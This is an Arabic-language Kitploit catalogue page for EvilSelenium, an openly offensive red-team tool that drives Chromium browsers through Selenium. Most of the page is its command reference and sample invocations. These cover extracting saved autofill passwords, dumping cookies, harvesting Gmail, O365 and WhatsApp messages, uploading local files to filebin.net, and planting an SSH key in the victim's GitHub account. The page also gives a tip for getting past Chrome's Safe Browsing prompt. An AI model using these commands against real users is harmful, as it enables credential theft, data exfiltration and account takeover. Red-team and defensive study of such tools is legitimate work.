Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
EvilSelenium — يحول أداة Selenium إلى سلاح لأتمتة سرقة بيانات الاعتماد، وتفريغ ملفات تعريف الارتباط، واستخراج البريد الإلكتروني، واستخراج الملفات من متصفحات Chromium لعمليات الفريق الأحمر. | Kitploit
أدوات/GitHubGitHub/mrd0x/evilselenium
أدوات التصيدتسريب البياناتجمع المعلوماتما بعد الاستغلالالهندسة الاجتماعيةالفريق الأحمر
GitHubmrd0x/evilselenium

EvilSelenium

يحول أداة Selenium إلى سلاح لأتمتة سرقة بيانات الاعتماد، وتفريغ ملفات تعريف الارتباط، واستخراج البريد الإلكتروني، واستخراج الملفات من متصفحات Chromium لعمليات الفريق الأحمر.

عرض المستودع
60593منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

EvilSelenium

EvilSelenium هو مشروع جديد يسخر Selenium لاستغلال المتصفحات المبنية على Chromium. الميزات الحالية هي:

  • سرقة بيانات الاعتماد المخزنة (عبر الملء التلقائي)
  • سرقة ملفات تعريف الارتباط (cookies)
  • أخذ لقطات شاشة للمواقع
  • تفريغ رسائل البريد الإلكتروني من Gmail/O365
  • تفريغ رسائل واتساب
  • تنزيل ورفع الملفات
  • إضافة مفاتيح SSH إلى GitHub

أو يمكنك توسيع الوظائف الحالية لتناسب احتياجاتك (مثل تنزيل الملفات من GDrive/OneDrive للمستخدم).

ملاحظة

  1. عند تشغيل هذه الأداة، ستقوم بإنهاء أي عمليات متصفح موجودة مسبقًا لتتمكن من العمل باستخدام ملف تعريف المتصفح الخاص بالمستخدم الذي يحتوي على كلمات المرور والجلسات النشطة.

  2. لقد بنيت هذه الأداة في حوالي أسبوع ولم أجري العديد من الاختبارات كما ينبغي، لذلك قد تظهر بعض الأخطاء.

  3. وحدات Selenium ليست دائمًا مستقرة. بسبب التغييرات المستمرة في المواقع، قد تتعطل بعض الوحدات أحيانًا. سأبذل قصارى جهدي للحفاظ على الوحدات الحالية لضمان عملها كما هو مقصود، لكن تم التحذير.

الاستخدام

root@kitploit:~
EvilSelenium.exe /?

/help - عرض قائمة المساعدة هذه.

SETUP:
/install - تثبيت chromedriver و Selenium webdriver. قم بتشغيل هذا مرة واحدة.

GLOBAL: (مقبول مع كل أمر)
/browserdir [appdata_local_routing] - استخدام متصفح مخصص، يجب أن يكون الإدخال هو المسار داخل مجلد %appdatalocal% (مثال "Microsoft\Edge")

RECON:
/enumsavedsites [out_path] - التحقق من المواقع التي تحتوي على كلمات مرور محفوظة عبر لقطة (لقطات) شاشة.
/screenshot [website] [out_path] - أخذ لقطة شاشة لصفحة ويب معينة.

CREDENTIALS:
/autorun - استخراج بيانات الاعتماد المحفوظة من المواقع الشائعة.
/dynamicid [login_page] [username_id] [password_id] - استخراج بيانات الاعتماد المحفوظة من موقع ويب، مع توفير معرف حقل اسم المستخدم ومعرف حقل كلمة المرور.
/dynamicname [login_page] [username_name] [password_name] - استخراج بيانات الاعتماد المحفوظة من موقع ويب، مع توفير قيمة اسم حقل اسم المستخدم وقيمة اسم حقل كلمة المرور.
/dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - استخراج بيانات الاعتماد المحفوظة من موقع ويب، مع توفير قيمة اسم حقل اسم المستخدم، وقيمة اسم حقل كلمة المرور، ومواقعهما.

COOKIES:
/cookies [website] - الحصول على ملفات تعريف الارتباط لموقع ويب معين.

MODULES:
/download [file_url] [seconds] - تنزيل ملف وتحديد وقت الانتظار حتى اكتمال التحميل. يجب ألا تكون امتدادات الملفات قابلة للتنفيذ.
/exfil [local_file] [seconds] - تحميل ملف على filebin.net وإخراج رابط التحميل.
/gmail [out_path] [num_of_emails] - جلب رسائل البريد الإلكتروني من mail.google.com إذا كان المستخدم مصادقًا. الحد الأقصى 50 رسالة.
/outlook [out_path] [num_of_emails] - جلب رسائل البريد الإلكتروني من Outlook إذا كان المستخدم مصادقًا.
/o365 [out_path] [num_of_emails] - جلب رسائل البريد الإلكتروني من O365 Outlook إذا كان المستخدم مصادقًا.
/github [key] - إضافة مفتاح SSH الخاص بك إلى Github إذا كان المستخدم مصادقًا.
/whatsapp [out_path] - جلب رسائل واتساب إذا كان المستخدم مصادقًا (BETA).

الإعداد

سيقوم الأمر /install بتنزيل Chrome Driver و Selenium WebDriver وهما المتطلبات الضرورية. سيعمل EvilSelenium على إصدارات Chrome 100-90.

مُختبر على Windows 10، Chrome v97 و v90.

root@kitploit:~
EvilSelenium.exe /install

الإعدادات العامة

بشكل افتراضي، سيحاول EvilSelenium استخدام مجلد بيانات المستخدم الخاص بـ Google Chrome لاسترجاع البيانات، ولكن المتصفحات الأخرى المبنية على Chromium مدعومة أيضًا.
لاستخدام متصفحات مختلفة مبنية على Chrome، يجب إضافة /browserdir متبوعًا بمسار المتصفح داخل مجلد %localappdata%. فيما يلي أمثلة لعدد من المتصفحات الشائعة (يجب إضافتها إلى أي أمر CLI):

  1. Brave - /browserdir BraveSoftware\Brave-Browser
  2. Microsoft Edge - /browserdir Microsoft\Edge
  3. Vivaldi - /browserdir Vivaldi

وحدة الاستطلاع

/enumsavedsites - سيأخذ لقطات شاشة لصفحة chrome://settings/passwords

/screenshot - لقطة شاشة لأي موقع ويب. إذا كان المستخدم مصادقًا على الموقع، ستحصل على لقطات شاشة مصادق عليها :).

وحدة بيانات الاعتماد

هام: ستقوم وحدة بيانات الاعتماد بحذف ملفات تعريف الارتباط (cookies) من أجل سرقة بيانات الاعتماد من الملء التلقائي. من الأفضل استخدام وحدة بيانات الاعتماد في النهاية إذا كنت ترغب في تصدير ملفات تعريف الارتباط.

/autorun - قوالب مبنية مسبقًا للمواقع الشائعة. سأستمر في إضافة المزيد.

/dynamicid - قم بتوفير رابط تسجيل الدخول مع معرف حقل إدخال اسم المستخدم ومعرف حقل كلمة المرور. هذا يعادل document.getElementById().

/dynamicname - إذا لم يكن للحقول معرفات، قم بتوفير قيم اسم الحقول. سيتم اختيار الفهرس الأول لقيم الأسماء. هذا يعادل document.getElementsByName()[0].value.

/dynamicname2 - قم بتوفير قيم اسم الحقول مع موضع الفهرس الخاص بها. هذا يعادل document.getElementsByName()[x].value حيث x هو الموضع المقدم.

وحدة ملفات تعريف الارتباط

/cookies - تفريغ ملفات تعريف الارتباط من الموقع المحدد.

وحدات متنوعة

هذه وحدات إضافية بنيتها لتوضيح أنواع الإجراءات التي يمكنك القيام بها باستخدام Selenium.

/download - تنزيل ملف وتحديد وقت الانتظار للتنزيل. يجب إضافة امتداد ملف غير قابل للتنفيذ إلى الملف قبل التنزيل لتجنب ظهور مطالبة Safebrowsing من Chrome.

/exfil - تحميل ملف على filebin.net وتحديد وقت الانتظار لاكتمال التحميل. بمجرد اكتمال التحميل، يتم كتابة رابط تحميل الملف.

/gmail - جلب رسائل البريد الإلكتروني من mail.google.com إذا كان المستخدم مصادقًا. الحد الأقصى 50 رسالة.

/outlook - جلب رسائل البريد الإلكتروني من Outlook إذا كان المستخدم مصادقًا.

/o365 - جلب رسائل البريد الإلكتروني من O365 Outlook إذا كان المستخدم مصادقًا.

/github - إضافة مفتاح SSH الخاص بك إلى Github إذا كان المستخدم مصادقًا.

/whatsapp - جلب رسائل واتساب إذا كان المستخدم مصادقًا (BETA).

أوامر نموذجية

root@kitploit:~
EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloads

EvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_password

EvilSelenium.exe /dynamicname https://linkedin.com session_key session_password

عرض توضيحي

مثال

الدعم

  • تابعني على تويتر @mrd0x
  • محفظة BTC: 38ApE9ciNHiXzEaQExLXdwM6TrEpz2wCUi (للقهوة بالطبع)
تنزيل الأداة